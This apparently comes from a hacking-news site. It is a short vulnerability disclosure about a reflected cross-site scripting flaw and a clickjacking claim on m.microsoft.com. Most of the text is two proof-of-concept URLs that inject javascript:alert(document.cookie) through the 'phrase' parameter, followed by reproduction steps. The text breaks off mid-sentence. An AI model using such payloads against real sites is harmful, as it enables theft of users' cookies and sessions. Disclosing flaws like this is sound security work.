Cookies xss in Microsoft mobile domain also it have xframe open vulnerability for click jacking Domain: m.microsoft.com Poc url steps for reproduce issue are same in both url so I am send both url and steps by using one of them Poc urls : 1. http://m.microsoft.com/showcase/en/US/Search.mspx?a=results&mid=3900&phrase=%5burl%3djavascript:alert(document.cookie)%5dClick%20here%20to%20see%20Result%5b/url%5d&Search = 2. http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] Vulnerable parameter: phrase= Steps for reproduce issue Poc url http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] when users use url .That give a result in Microsoft site like
hacking stuff , latest hacking updates , hacking tools ,